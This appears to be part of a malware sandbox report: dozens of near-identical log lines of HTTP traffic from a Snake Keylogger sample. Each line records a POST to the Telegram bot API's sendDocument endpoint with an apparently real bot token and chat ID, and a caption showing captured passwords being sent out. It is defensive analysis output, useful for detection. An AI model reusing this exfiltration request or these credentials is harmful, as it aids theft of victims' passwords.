                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757064d3a4aHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570688d784Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575706c6d31cHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575707026da8Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570739440eHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570774df27Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575707b2db3cHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575707f0d815Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757082c7276Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757086a6f82Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575708a60af7Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575709220422Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570964c68eHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570a1c5b38Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570a53311cHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570a95f6b0Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570accc8e1Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570b0865d5Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570b466176Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570b7ad4f1Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570bfdf55cHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570c5fb674Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570c9db3f6Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570cdbaffaHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570d174be5Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570d554840Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570d90e459Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570dc7be8eHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570e1403dbHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570e4f9f4cHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570e8d9c05Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570ecb98ccHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570f0733b7Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570f537ed5Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570f8a5578Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57570fcd1726Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571003ec9fHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757103f87ebHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575710765e06Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575710b1f912Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575710e8ce44Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757112469dbHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571162661fHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da57571196da58Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575711d4d6c1Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575712094b6bHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757124748d1Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575712854476Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575712c806a4Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757130d2b62Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575713524e97Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757139e9a3dHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575713dc96afHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575714457e05Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575714837b7dHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575714eec568Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757152338e1Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757156135bbHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757159cd6bcHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575715e1f502Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757161ff376Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757166515a2Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575716bfaf36Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575716f42491Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575717322199Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575717964394Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575717d1de33Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757180fda9cHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757184b76f0Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575718824b6cHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575718ed951dHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575719293048Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757196006aaHost: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da5757199ba0d3Host: api.telegram.orgContent-Length: 504
                Source: global trafficHTTP traffic detected: POST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8da575719d99d79Host: api.telegram.orgContent-Length: 504
